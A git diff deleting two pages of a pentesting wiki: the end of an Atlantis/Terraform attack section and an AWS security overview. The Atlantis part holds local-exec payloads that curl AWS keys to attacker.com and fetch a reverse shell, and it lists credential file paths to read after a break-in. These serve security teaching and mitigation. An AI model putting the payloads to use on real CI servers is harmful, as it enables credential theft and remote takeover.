- * Check potential [**branch protections bypasses**](github-security/#branch-protection-bypass)\*\*\*\*
-* **Approved**: If this protection is set in Atlantis, some **other user must approve the PR** before you can run `atlantis apply`
- * By default you can abuse the [**Gitbot token to bypass this protection**](github-security/#github\_token)\*\*\*\*
-
-Running **`terraform apply` on a malicious Terraform file with** [**local-exec**](https://www.terraform.io/docs/provisioners/local-exec.html)**.**\
-\*\*\*\* You just need to make sure some payload like the following ones ends in the `main.tf` file:
-
-```json
-// Payload 1 to just steal a secret
-resource "null_resource" "secret_stealer" {
- provisioner "local-exec" {
- command = "curl https://attacker.com?access_key=$AWS_ACCESS_KEY&secret=$AWS_SECRET_KEY"
- }
-}
-
-// Payload 2 to get a rev shell
-resource "null_resource" "rev_shell" {
- provisioner "local-exec" {
- command = "sh -c 'curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh'"
- }
-}
-```
-
-Follow the **suggestions from the previous technique** the perform this attack in a **stealthier way**.
-
-### Terraform Param Injection
-
-When running `atlantis plan` or `atlantis apply` terraform is being run under-needs, you can pass commands to terraform from atlantis commenting something like:
-
-```bash
-atlantis plan --
-atlantis plan -- -h #Get terraform plan help
-
-atlantis apply --
-atlantis apply -- -h #Get terraform apply help
-```
-
-Something you can pass are env variables which might be helpful to bypass some protections. Check terraform env vars in [https://www.terraform.io/cli/config/environment-variables](https://www.terraform.io/cli/config/environment-variables)
-
-### Custom Workflow
-
-Running **malicious custom build commands** specified in an `atlantis.yaml` file. Atlantis uses the `atlantis.yaml` file from the pull request branch, **not** of `master`.\
-This possibility was mentioned in a previous section:
-
-{% hint style="danger" %}
-If the flag \*\*\*\* `allow_custom_workflows` is set to **True**, workflows can be **specified** in the **`atlantis.yaml`** file of each repo.\
-This will basically give **RCE in the Atlantis server to any user that can access that repo**.
-
-```yaml
-# atlantis.yaml
-version: 3
-projects:
-- dir: .
- workflow: custom1
-workflows:
- custom1:
- plan:
- steps:
- - init
- - run: my custom plan command
- apply:
- steps:
- - run: my custom apply command
-```
-{% endhint %}
-
-### PR Hijacking
-
-If someone sends **`atlantis plan/apply` comments on your valid pull requests,** it will cause terraform to run when you don't want it to.
-
-Moreover, if you don't have configured in the **branch protection** to ask to **reevaluate** every PR when a **new commit is pushed** to it, someone could **write malicious configs** (check previous scenarios) in the terraform config, run `atlantis plan/apply` and gain RCE.
-
-This is the **setting** in Github branch protections:
-
-![](<../.gitbook/assets/image (307) (4).png>)
-
-### Webhook Secret
-
-If you manage to **steal the webhook secret** used or if there **isn't any webhook secret** being used, you could **call the Atlantis webhook** and **invoke atlatis commands** directly.
-
-### Bitbucket
-
-Bitbucket Cloud does **not support webhook secrets**. This could allow attackers to **spoof requests from Bitbucket**. Ensure you are allowing only Bitbucket IPs.
-
-* This means that an **attacker** could make **fake requests to Atlantis** that look like they're coming from Bitbucket.
-* If you are specifying `--repo-allowlist` then they could only fake requests pertaining to those repos so the most damage they could do would be to plan/apply on your own repos.
-* To prevent this, allowlist [Bitbucket's IP addresses](https://confluence.atlassian.com/bitbucket/what-are-the-bitbucket-cloud-ip-addresses-i-should-use-to-configure-my-corporate-firewall-343343385.html) (see Outbound IPv4 addresses).
-
-## Post-Exploitation
-
-If you managed to get access to the server or at least you got a LFI there are some interesting things you should try to read:
-
-* `/home/atlantis/.git-credentials` Contains vcs access credentials
-* `/atlantis-data/atlantis.db` Contains vcs access credentials with more info
-* `/atlantis-data/repos/`_`/`_`////.terraform/terraform.tfstate` Terraform stated file
- * Example: /atlantis-data/repos/ghOrg\_/\_myRepo/20/default/env/prod/.terraform/terraform.tfstate
-* `/proc/1/environ` Env variables
-* `/proc/[2-20]/cmdline` Cmd line of `atlantis server` (may contain sensitive data)
-
-## Mitigations
-
-### Don't Use On Public Repos
-
-Because anyone can comment on public pull requests, even with all the security mitigations available, it's still dangerous to run Atlantis on public repos without proper configuration of the security settings.
-
-### Don't Use `--allow-fork-prs`
-
-If you're running on a public repo (which isn't recommended, see above) you shouldn't set `--allow-fork-prs` (defaults to false) because anyone can open up a pull request from their fork to your repo.
-
-### `--repo-allowlist`
-
-Atlantis requires you to specify a allowlist of repositories it will accept webhooks from via the `--repo-allowlist` flag. For example:
-
-* Specific repositories: `--repo-allowlist=github.com/runatlantis/atlantis,github.com/runatlantis/atlantis-tests`
-* Your whole organization: `--repo-allowlist=github.com/runatlantis/*`
-* Every repository in your GitHub Enterprise install: `--repo-allowlist=github.yourcompany.com/*`
-* All repositories: `--repo-allowlist=*`. Useful for when you're in a protected network but dangerous without also setting a webhook secret.
-
-This flag ensures your Atlantis install isn't being used with repositories you don't control. See `atlantis server --help` for more details.
-
-### Protect Terraform Planning
-
-If attackers submitting pull requests with malicious Terraform code is in your threat model then you must be aware that `terraform apply` approvals are not enough. It is possible to run malicious code in a `terraform plan` using the [`external` data source](https://registry.terraform.io/providers/hashicorp/external/latest/docs/data-sources/data\_source) or by specifying a malicious provider. This code could then exfiltrate your credentials.
-
-To prevent this, you could:
-
-1. Bake providers into the Atlantis image or host and deny egress in production.
-2. Implement the provider registry protocol internally and deny public egress, that way you control who has write access to the registry.
-3. Modify your [server-side repo configuration](https://www.runatlantis.io/docs/server-side-repo-config.html)'s `plan` step to validate against the use of disallowed providers or data sources or PRs from not allowed users. You could also add in extra validation at this point, e.g. requiring a "thumbs-up" on the PR before allowing the `plan` to continue. Conftest could be of use here.
-
-### Webhook Secrets
-
-Atlantis should be run with Webhook secrets set via the `$ATLANTIS_GH_WEBHOOK_SECRET`/`$ATLANTIS_GITLAB_WEBHOOK_SECRET` environment variables. Even with the `--repo-allowlist` flag set, without a webhook secret, attackers could make requests to Atlantis posing as a repository that is allowlisted. Webhook secrets ensure that the webhook requests are actually coming from your VCS provider (GitHub or GitLab).
-
-If you are using Azure DevOps, instead of webhook secrets add a basic username and password.
-
-[**#**](https://www.runatlantis.io/docs/security.html#azure-devops-basic-authentication)**Azure DevOps Basic Authentication**
-
-Azure DevOps supports sending a basic authentication header in all webhook events. This requires using an HTTPS URL for your webhook location.
-
-### SSL/HTTPS
-
-If you're using webhook secrets but your traffic is over HTTP then the webhook secrets could be stolen. Enable SSL/HTTPS using the `--ssl-cert-file` and `--ssl-key-file` flags.
-
-### Enable Authentication on Atlantis Web Server
-
-It is very recommended to enable authentication in the web service. Enable BasicAuth using the `--web-basic-auth=true` and setup a username and a password using `--web-username=yourUsername` and `--web-password=yourPassword` flags.
-
-You can also pass these as environment variables `ATLANTIS_WEB_BASIC_AUTH=true` `ATLANTIS_WEB_USERNAME=yourUsername` and `ATLANTIS_WEB_PASSWORD=yourPassword`.
-
-## References
-
-* [**https://www.runatlantis.io/docs**](https://www.runatlantis.io/docs)\*\*\*\*
-
-
-
-Support HackTricks and get benefits!
-
-* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**π¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**π¦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
diff --git a/cloud-security/aws-security.md b/cloud-security/aws-security.md
deleted file mode 100644
index 71a11f3b1..000000000
--- a/cloud-security/aws-security.md
+++ /dev/null
@@ -1,1019 +0,0 @@
-
-
-
-
-Support HackTricks and get benefits!
-
-- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
-- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
-- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-- **Join the** [**π¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**π¦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
-- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
-
-
-# Types of services
-
-## Container services
-
-Services that fall under container services have the following characteristics:
-
-* The service itself runs on **separate infrastructure instances**, such as EC2.
-* **AWS** is responsible for **managing the operating system and the platform**.
-* A managed service is provided by AWS, which is typically the service itself for the **actual application which are seen as containers**.
-* As a user of these container services, you have a number of management and security responsibilities, including **managing network access security, such as network access control list rules and any firewalls**.
-* Also, platform-level identity and access management where it exists.
-* **Examples** of AWS container services include Relational Database Service, Elastic Mapreduce, and Elastic Beanstalk.
-
-## Abstract Services
-
-* These services are **removed, abstracted, from the platform or management layer which cloud applications are built on**.
-* The services are accessed via endpoints using AWS application programming interfaces, APIs.
-* The **underlying infrastructure, operating system, and platform is managed by AWS**.
-* The abstracted services provide a multi-tenancy platform on which the underlying infrastructure is shared.
-* **Data is isolated via security mechanisms**.
-* Abstract services have a strong integration with IAM, and **examples** of abstract services include S3, DynamoDB, Amazon Glacier, and SQS.
-
-# IAM - Identity and Access Management
-
-IAM is the service that will allow you to manage **Authentication**, **Authorization** and **Access Control** inside your AWS account.
-
-* **Authentication** - Process of defining an identity and the verification of that identity. This process can be subdivided in: Identification and verification.
-* **Authorization** - Determines what an identity can access within a system once it's been authenticated to it.
-* **Access Control** - The method and process of how access is granted to a secure resource
-
-IAM can be defined by its ability to manage, control and govern authentication, authorization and access control mechanisms of identities to your resources within your AWS account.
-
-## Users
-
-This could be a **real person** within your organization who requires access to operate and maintain your AWS environment. Or it could be an account to be used by an **application** that may require permissions to **access** your **AWS** resources **programmatically**. Note that **usernames must be unique**.
-
-### CLI
-
-* **Access Key ID**: 20 random uppercase alphanumeric characters like AKHDNAPO86BSHKDIRYT
-* **Secret access key ID**: 40 random upper and lowercase characters: S836fh/J73yHSb64Ag3Rkdi/jaD6sPl6/antFtU (It's not possible to retrieve lost secret access key IDs).
-
-Whenever you need to **change the Access Key** this is the process you should follow:\
-_Create a new access key -> Apply the new key to system/application -> mark original one as inactive -> Test and verify new access key is working -> Delete old access key_
-
-**MFA** is **supported** when using the AWS **CLI**.
-
-## Groups
-
-These are objects that **contain multiple users**. Permissions can be assigned to a user or inherit form a group. **Giving permission to groups and not to users the secure way to grant permissions**.
-
-## Roles
-
-Roles are used to grant identities a set of permissions. **Roles don't have any access keys or credentials associated with them**. Roles are usually used with resources (like EC2 machines) but they can also be useful to grant **temporary privileges to a user**. Note that when for example an EC2 has an IAM role assigned, instead of saving some keys inside the machine, dynamic temporary access keys will be supplied by the IAM role to handle authentication and determine if access is authorized.
-
-An IAM role consists of **two types of policies**: A **trust policy**, which cannot be empty, defining who can assume the role, and a **permissions policy**, which cannot be empty, defining what they can access.
-
-### AWS Security Token Service (STS)
-
-This is a web service that enables you to **request temporary, limited-privilege credentials** for AWS Identity and Access Management (IAM) users or for users that you authenticate (federated users).
-
-## Policies
-
-### Policy Permissions
-
-Are used to assign permissions. There are 2 types:
-
-* AWS managed policies (preconfigured by AWS)
-* Customer Managed Policies: Configured by you. You can create policies based on AWS managed policies (modifying one of them and creating your own), using the policy generator (a GUI view that helps you granting and denying permissions) or writing your own..
-
-By **default access** is **denied**, access will be granted if an explicit role has been specified. \
-If **single "Deny" exist, it will override the "Allow"**, except for requests that use the AWS account's root security credentials (which are allowed by default).
-
-```javascript
-{
- "Version": "2012-10-17", //Version of the policy
- "Statement": [ //Main element, there can be more than 1 entry in this array
- {
- "Sid": "Stmt32894y234276923" //Unique identifier (optional)
- "Effect": "Allow", //Allow or deny
- "Action": [ //Actions that will be allowed or denied
- "ec2:AttachVolume",
- "ec2:DetachVolume"
- ],
- "Resource": [ //Resource the action and effect will be applied to
- "arn:aws:ec2:*:*:volume/*",
- "arn:aws:ec2:*:*:instance/*"
- ],
- "Condition": { //Optional element that allow to control when the permission will be effective
- "ArnEquals": {"ec2:SourceInstanceARN": "arn:aws:ec2:*:*:instance/instance-id"}
- }
- }
- ]
-}
-```
-
-### Inline Policies
-
-This kind of policies are **directly assigned** to a user, group or role. Then, they not appear in the Policies list as any other one can use them.\
-Inline policies are useful if you want to **maintain a strict one-to-one relationship between a policy and the identity** that it's applied to. For example, you want to be sure that the permissions in a policy are not inadvertently assigned to an identity other than the one they're intended for. When you use an inline policy, the permissions in the policy cannot be inadvertently attached to the wrong identity. In addition, when you use the AWS Management Console to delete that identity, the policies embedded in the identity are deleted as well. That's because they are part of the principal entity.
-
-### S3 Bucket Policies
-
-Can only be applied to S3 Buckets. They contains an attribute called 'principal' that can be: IAM users, Federated users, another AWS account, an AWS service. P**rincipals define who/what should be allowed or denied access to various S3 resources.**
-
-## Multi-Factor Authentication
-
-It's used to **create an additional factor for authentication** in addition to your existing methods, such as password, therefore, creating a multi-factor level of authentication.\
-You can use a **free virtual application or a physical device**. You can use apps like google authentication for free to activate a MFA in AWS.
-
-## Identity Federation
-
-Identity federation **allows users from identity providers which are external** to AWS to access AWS resources securely without having to supply AWS user credentials from a valid IAM user account. \
-An example of an identity provider can be your own corporate Microsoft Active Directory(via SAML) or OpenID services (like Google). Federated access will then allow the users within it to access AWS.\
-AWS Identity Federation connects via IAM roles.
-
-### Cross Account Trusts and Roles
-
-**A user** (trusting) can create a Cross Account Role with some policies and then, **allow another user** (trusted) to **access his account** but only h**aving the access indicated in the new role policies**. To create this, just create a new Role and select Cross Account Role. Roles for Cross-Account Access offers two options. Providing access between AWS accounts that you own, and providing access between an account that you own and a third party AWS account.\
-It's recommended to **specify the user who is trusted and not put some generic thing** because if not, other authenticated users like federated users will be able to also abuse this trust.
-
-### AWS Simple AD
-
-Not supported:
-
-* Trust Relations
-* AD Admin Center
-* Full PS API support
-* AD Recycle Bin
-* Group Managed Service Accounts
-* Schema Extensions
-* No Direct access to OS or Instances
-
-### Web Federation or OpenID Authentication
-
-The app uses the AssumeRoleWithWebIdentity to create temporary credentials. However this doesn't grant access to the AWS console, just access to resources within AWS.
-
-## Other IAM options
-
-* You can **set a password policy setting** options like minimum length and password requirements.
-* You can **download "Credential Report"** with information about current credentials (like user creation time, is password enabled...). You can generate a credential report as often as once every **four hours**.
-
-# KMS - Key Management Service
-
-AWS Key Management Service (AWS KMS) is a managed service that makes it easy for you to **create and control **_**customer master keys**_** (CMKs)**, the encryption keys used to encrypt your data. AWS KMS CMKs are **protected by hardware security modules** (HSMs)
-
-KMS uses **symmetric cryptography**. This is used to **encrypt information as rest** (for example, inside a S3). If you need to **encrypt information in transit** you need to use something like **TLS**.\
-KMS is a **region specific service**.
-
-**Administrators at Amazon do not have access to your keys**. They cannot recover your keys and they do not help you with encryption of your keys. AWS simply administers the operating system and the underlying application it's up to us to administer our encryption keys and administer how those keys are used.
-
-**Customer Master Keys** (CMK): Can encrypt data up to 4KB in size. They are typically used to create, encrypt, and decrypt the DEKs (Data Encryption Keys). Then the DEKs are used to encrypt the data.
-
-A customer master key (CMK) is a logical representation of a master key in AWS KMS. In addition to the master key's identifiers and other metadata, including its creation date, description, and key state, a **CMK contains the key material which used to encrypt and decrypt data**. When you create a CMK, by default, AWS KMS generates the key material for that CMK. However, you can choose to create a CMK without key material and then import your own key material into that CMK.
-
-There are 2 types of master keys:
-
-* **AWS managed CMKs: Used by other services to encrypt data**. It's used by the service that created it in a region. They are created the first time you implement the encryption in that service. Rotates every 3 years and it's not possible to change it.
-* **Customer manager CMKs**: Flexibility, rotation, configurable access and key policy. Enable and disable keys.
-
-**Envelope Encryption** in the context of Key Management Service (KMS): Two-tier hierarchy system to **encrypt data with data key and then encrypt data key with master key**.
-
-## Key Policies
-
-These defines **who can use and access a key in KMS**. By default root user has full access over KMS, if you delete this one, you need to contact AWS for support.
-
-Properties of a policy:
-
-* JSON based document
-* Resource --> Affected resources (can be "\*")
-* Action --> kms:Encrypt, kms:Decrypt, kms:CreateGrant ... (permissions)
-* Effect --> Allow/Deny
-* Principal --> arn affected
-* Conditions (optional) --> Condition to give the permissions
-
-Grants:
-
-* Allow to delegate your permissions to another AWS principal within your AWS account. You need to create them using the AWS KMS APIs. It can be indicated the CMK identifier, the grantee principal and the required level of opoeration (Decrypt, Encrypt, GenerateDataKey...)
-* After the grant is created a GrantToken and a GratID are issued
-
-Access:
-
-* Via key policy -- If this exist, this takes precedent over the IAM policy, s the IAM olicy is not used
-* Via IAM policy
-* Via grants
-
-## Key Administrators
-
-Key administrator by default:
-
-* Have access to manage KMS but not to encrypt or decrypt data
-* Only IAM users and roles can be added to Key Administrators list (not groups)
-* If external CMK is used, Key Administrators have the permission to import key material
-
-## Rotation of CMKs
-
-* The longer the same key is left in place, the more data is encrypted with that key, and if that key is breached, then the wider the blast area of data is at risk. In addition to this, the longer the key is active, the probability of it being breached increases.
-* **KMS rotate customer keys every 365 days** (or you can perform the process manually whenever you want) and **keys managed by AWS every 3 years** and this time it cannot be changed.
-* **Older keys are retained** to decrypt data that was encrypted prior to the rotation
-* In a break, rotating the key won't remove the threat as it will be possible to decrypt all the data encrypted with the compromised key. However, the **new data will be encrypted with the new key**.
-* If **CMK** is in state of **disabled** or **pending** **deletion**, KMS will **not perform a key rotation** until the CMK is re-enabled or deletion is cancelled.
-
-### Manual rotation
-
-* A **new CMK needs to be created**, then, a new CMK-ID is created, so you will need to **update** any **application** to **reference** the new CMK-ID.
-* To do this process easier you can **use aliases to refer to a key-id** and then just update the key the alias is referring to.
-* You need to **keep old keys to decrypt old files** encrypted with it.
-
-You can import keys from your on-premises key infrastructure .
-
-## Other information
-
-KMS is priced per number of encryption/decryption requests received from all services per month.
-
-KMS has full audit and compliance **integration with CloudTrail**; this is where you can audit all changes performed on KMS.
-
-With KMS policy you can do the following:
-
-* Limit who can create data keys and which services have access to use these keys
-* Limit systems access to encrypt only, decrypt only or both
-* Define to enable systems to access keys across regions (although it is not recommended as a failure in the region hosting KMS will affect availability of systems in other regions).
-
-You cannot synchronize or move/copy keys across regions; you can only define rules to allow access across region.
-
-# S3
-
-Amazon S3 is a service that allows you **store important amounts of data**.
-
-Amazon S3 provides multiple options to achieve the **protection** of data at REST. The options include **Permission** (Policy), **Encryption** (Client and Server Side), **Bucket Versioning** and **MFA** **based delete**. The **user can enable** any of these options to achieve data protection. **Data replication** is an internal facility by AWS where **S3 automatically replicates each object across all the Availability Zones** and the organization need not enable it in this case.
-
-With resource-based permissions, you can define permissions for sub-directories of your bucket separately.
-
-## S3 Access logs
-
-It's possible to **enable S3 access login** (which by default is disabled) to some bucket and save the logs in a different bucket to know who is accessing the bucket. The source bucket and the target bucket (the one is saving the logs needs to be in the same region.
-
-## S3 Encryption Mechanisms
-
-**DEK means Data Encryption Key** and is the key that is always generated and used to encrypt data.
-
-**Server-side encryption with S3 managed keys, SSE-S3:** This option requires minimal configuration and all management of encryption keys used are managed by AWS. All you need to do is to **upload your data and S3 will handle all other aspects**. Each bucket in a S3 account is assigned a bucket key.
-
-* Encryption:
- * Object Data + created plaintext DEK --> Encrypted data (stored inside S3)
- * Created plaintext DEK + S3 Master Key --> Encrypted DEK (stored inside S3) and plain text is deleted from memory
-* Decryption:
- * Encrypted DEK + S3 Master Key --> Plaintext DEK
- * Plaintext DEK + Encrypted data --> Object Data
-
-Please, note that in this case **the key is managed by AWS** (rotation only every 3 years). If you use your own key you willbe able to rotate, disable and apply access control.
-
-**Server-side encryption with KMS managed keys, SSE-KMS:** This method allows S3 to use the key management service to generate your data encryption keys. KMS gives you a far greater flexibility of how your keys are managed. For example, you are able to disable, rotate, and apply access controls to the CMK, and order to against their usage using AWS Cloud Trail.
-
-* Encryption:
- * S3 request data keys from KMS CMK
- * KMS uses a CMK to generate the pair DEK plaintext and DEK encrypted and send them to SΒ£
- * S3 uses the paintext key to encrypt the data, store the encrypted data and the encrypted key and deletes from memory the plain text key
-* Decryption:
- * S3 ask to KMS to decrypt the encrypted data key of the object
- * KMS decrypt the data key with the CMK and send it back to S3
- * S3 decrypts the object data
-
-**Server-side encryption with customer provided keys, SSE-C:** This option gives you the opportunity to provide your own master key that you may already be using outside of AWS. Your customer-provided key would then be sent with your data to S3, where S3 would then perform the encryption for you.
-
-* Encryption:
- * The user sends the object data + Customer key to S3
- * The customer key is used to encrypt the data and the encrypted data is stored
- * a salted HMAC value of the customer key is stored also for future key validation
- * the customer key is deleted from memory
-* Decryption:
- * The user send the customer key
- * The key is validated against the HMAC value stored
- * The customer provided key is then used to decrypt the data
-
-**Client-side encryption with KMS, CSE-KMS:** Similarly to SSE-KMS, this also uses the key management service to generate your data encryption keys. However, this time KMS is called upon via the client not S3. The encryption then takes place client-side and the encrypted data is then sent to S3 to be stored.
-
-* Encryption:
- * Client request for a data key to KMS
- * KMS returns the plaintext DEK and the encrypted DEK with the CMK
- * Both keys are sent back
- * The client then encrypts the data with the plaintext DEK and send to S3 the encrypted data + the encrypted DEK (which is saved as metadata of the encrypted data inside S3)
-* Decryption:
- * The encrypted data with the encrypted DEK is sent to the client
- * The client asks KMS to decrypt the encrypted key using the CMK and KMS sends back the plaintext DEK
- * The client can now decrypt the encrypted data
-
-**Client-side encryption with customer provided keys, CSE-C:** Using this mechanism, you are able to utilize your own provided keys and use an AWS-SDK client to encrypt your data before sending it to S3 for storage.
-
-* Encryption:
- * The client generates a DEK and encrypts the plaintext data
- * Then, using it's own custom CMK it encrypts the DEK
- * submit the encrypted data + encrypted DEK to S3 where it's stored
-* Decryption:
- * S3 sends the encrypted data and DEK
- * As the client already has the CMK used to encrypt the DEK, it decrypts the DEK and then uses the plaintext DEK to decrypt the data
-
-# HSM - Hardware Security Module
-
-Cloud HSM is a FIPS 140 level two validated **hardware device** for secure cryptographic key storage (note that CloudHSM is a hardware appliance, it is not a virtualized service). It is a SafeNetLuna 7000 appliance with 5.3.13 preloaded. There are two firmware versions and which one you pick is really based on your exact needs. One is for FIPS 140-2 compliance and there was a newer version that can be used.
-
-The unusual feature of CloudHSM is that it is a physical device, and thus it is **not shared with other customers**, or as it is commonly termed, multi-tenant. It is dedicated single tenant appliance exclusively made available to your workloads
-
-Typically, a device is available within 15 minutes assuming there is capacity, but if the AZ is out of capacity it can take two weeks or more to acquire additional capacity.
-
-Both KMS and CloudHSM are available to you at AWS and both are integrated with your apps at AWS. Since this is a physical device dedicated to you, **the keys are stored on the device**. Keys need to either be **replicated to another device**, backed up to offline storage, or exported to a standby appliance. **This device is not backed** by S3 or any other service at AWS like KMS.
-
-In **CloudHSM**, you have to **scale the service yourself**. You have to provision enough CloudHSM devices to handle whatever your encryption needs are based on the encryption algorithms you have chosen to implement for your solution.\
-Key Management Service scaling is performed by AWS and automatically scales on demand, so as your use grows, so might the number of CloudHSM appliances that are required. Keep this in mind as you scale your solution and if your solution has auto-scaling, make sure your maximum scale is accounted for with enough CloudHSM appliances to service the solution.
-
-Just like scaling, **performance is up to you with CloudHSM**. Performance varies based on which encryption algorithm is used and on how often you need to access or retrieve the keys to encrypt the data. Key management service performance is handled by Amazon and automatically scales as demand requires it. CloudHSM's performance is achieved by adding more appliances and if you need more performance you either add devices or alter the encryption method to the algorithm that is faster.
-
-If your solution is **multi-region**, you should add several **CloudHSM appliances in the second region and work out the cross-region connectivity with a private VPN connection** or some method to ensure the traffic is always protected between the appliance at every layer of the connection. If you have a multi-region solution you need to think about how to **replicate keys and set up additional CloudHSM devices in the regions where you operate**. You can very quickly get into a scenario where you have six or eight devices spread across multiple regions, enabling full redundancy of your encryption keys.
-
-**CloudHSM** is an enterprise class service for secured key storage and can be used as a **root of trust for an enterprise**. It can store private keys in PKI and certificate authority keys in X509 implementations. In addition to symmetric keys used in symmetric algorithms such as AES, **KMS stores and physically protects symmetric keys only (cannot act as a certificate authority)**, so if you need to store PKI and CA keys a CloudHSM or two or three could be your solution.
-
-**CloudHSM is considerably more expensive than Key Management Service**. CloudHSM is a hardware appliance so you have fix costs to provision the CloudHSM device, then an hourly cost to run the appliance. The cost is multiplied by as many CloudHSM appliances that are required to achieve your specific requirements.\
-Additionally, cross consideration must be made in the purchase of third party software such as SafeNet ProtectV software suites and integration time and effort. Key Management Service is a usage based and depends on the number of keys you have and the input and output operations. As key management provides seamless integration with many AWS services, integration costs should be significantly lower. Costs should be considered secondary factor in encryption solutions. Encryption is typically used for security and compliance.
-
-**With CloudHSM only you have access to the keys** and without going into too much detail, with CloudHSM you manage your own keys. **With KMS, you and Amazon co-manage your keys**. AWS does have many policy safeguards against abuse and **still cannot access your keys in either solution**. The main distinction is compliance as it pertains to key ownership and management, and with CloudHSM, this is a hardware appliance that you manage and maintain with exclusive access to you and only you.
-
-## CloudHSM Suggestions
-
-1. Always deploy CloudHSM in an **HA setup** with at least two appliances in **separate availability zones**, and if possible, deploy a third either on premise or in another region at AWS.
-2. Be careful when **initializing** a **CloudHSM**. This action **will destroy the keys**, so either have another copy of the keys or be absolutely sure you do not and never, ever will need these keys to decrypt any data.
-3. CloudHSM only **supports certain versions of firmware** and software. Before performing any update, make sure the firmware and or software is supported by AWS. You can always contact AWS support to verify if the upgrade guide is unclear.
-4. The **network configuration should never be changed.** Remember, it's in a AWS data center and AWS is monitoring base hardware for you. This means that if the hardware fails, they will replace it for you, but only if they know it failed.
-5. The **SysLog forward should not be removed or changed**. You can always **add** a SysLog forwarder to direct the logs to your own collection tool.
-6. The **SNMP** configuration has the same basic restrictions as the network and SysLog folder. This **should not be changed or removed**. An **additional** SNMP configuration is fine, just make sure you do not change the one that is already on the appliance.
-7. Another interesting best practice from AWS is **not to change the NTP configuration**. It is not clear what would happen if you did, so keep in mind that if you don't use the same NTP configuration for the rest of your solution then you could have two time sources. Just be aware of this and know that the CloudHSM has to stay with the existing NTP source.
-
-The initial launch charge for CloudHSM is $5,000 to allocate the hardware appliance dedicated for your use, then there is an hourly charge associated with running CloudHSM that is currently at $1.88 per hour of operation, or approximately $1,373 per month.
-
-The most common reason to use CloudHSM is compliance standards that you must meet for regulatory reasons. **KMS does not offer data support for asymmetric keys. CloudHSM does let you store asymmetric keys securely**.
-
-The **public key is installed on the HSM appliance during provisioning** so you can access the CloudHSM instance via SSH.
-
-# Amazon Athena
-
-Amazon Athena is an interactive query service that makes it easy to **analyze data** directly in Amazon Simple Storage Service (Amazon **S3**) **using** standard **SQL**.
-
-You need to **prepare a relational DB table** with the format of the content that is going to appear in the monitored S3 buckets. And then, Amazon Athena will be able to populate the DB from th logs, so you can query it.
-
-Amazon Athena supports the **hability to query S3 data that is already encrypted** and if configured to do so, **Athena can also encrypt the results of the query which can then be stored in S3**.
-
-**This encryption of results is independent of the underlying queried S3 data**, meaning that even if the S3 data is not encrypted, the queried results can be encrypted. A couple of points to be aware of is that Amazon Athena only supports data that has been **encrypted** with the **following S3 encryption methods**, **SSE-S3, SSE-KMS, and CSE-KMS**.
-
-SSE-C and CSE-E are not supported. In addition to this, it's important to understand that Amazon Athena will only run queries against **encrypted objects that are in the same region as the query itself**. If you need to query S3 data that's been encrypted using KMS, then specific permissions are required by the Athena user to enable them to perform the query.
-
-# AWS CloudTrail
-
-This service **tracks and monitors AWS API calls made within the environment**. Each call to an API (event) is logged. Each logged event contains:
-
-* The name of the called API: `eventName`
-* The called service: `eventSource`
-* The time: `eventTime`
-* The IP address: `SourceIPAddress`
-* The agent method: `userAgent`. Examples:
- * Signing.amazonaws.com - From AWS Management Console
- * console.amazonaws.com - Root user of the account
- * lambda.amazonaws.com - AWS Lambda
-* The request parameters: `requestParameters`
-* The response elements: `responseElements`
-
-Event's are written to a new log file **approximately each 5 minutes in a JSON file**, they are held by CloudTrail and finally, log files are **delivered to S3 approximately 15mins after**.\
-CloudTrail allows to use **log file integrity in order to be able to verify that your log files have remained unchanged** since CloudTrail delivered them to you. It creates a SHA-256 hash of the logs inside a digest file. A sha-256 hash of the new logs is created every hour.\
-When creating a Trail the event selectors will allow you to indicate the trail to log: Management, data or insights events.
-
-Logs are saved in an S3 bucket. By default Server Side Encryption is used (SSE-S3) so AWS will decrypt the content for the people that has access to it, but for additional security you can use SSE with KMS and your own keys.
-
-## Log File Naing Convention
-
-![](<../.gitbook/assets/image (429).png>)
-
-## S3 folder structure
-
-![](<../.gitbook/assets/image (428).png>)
-
-Note that the folders "_AWSLogs_" and "_CloudTrail_" are fixed folder names,
-
-**Digest** files have a similar folders path:
-
-![](<../.gitbook/assets/image (437).png>)
-
-## Aggregate Logs from Multiple Accounts
-
-* Create a Trial in the AWS account where you want the log files to be delivered to
-* Apply permissions to the destination S3 bucket allowing cross-account access for CloudTrail and allow each AWS account that needs access
-* Create a new Trail in the other AWS accounts and select to use the created bucket in step 1
-
-However, even if you can save al the logs in the same S3 bucket, you cannot aggregate CloudTrail logs from multiple accounts into a CloudWatch Logs belonging to a single AWS account
-
-## Log Files Checking
-
-You can check that the logs haven't been altered by running
-
-```javascript
-aws cloudtrail validate-logs --trail-arn --start-time [--end-time ] [--s3-bucket ] [--s3-prefix ] [--verbose]
-```
-
-## Logs to CloudWatch
-
-**CloudTrail can automatically send logs to CloudWatch so you can set alerts that warns you when suspicious activities are performed.**\
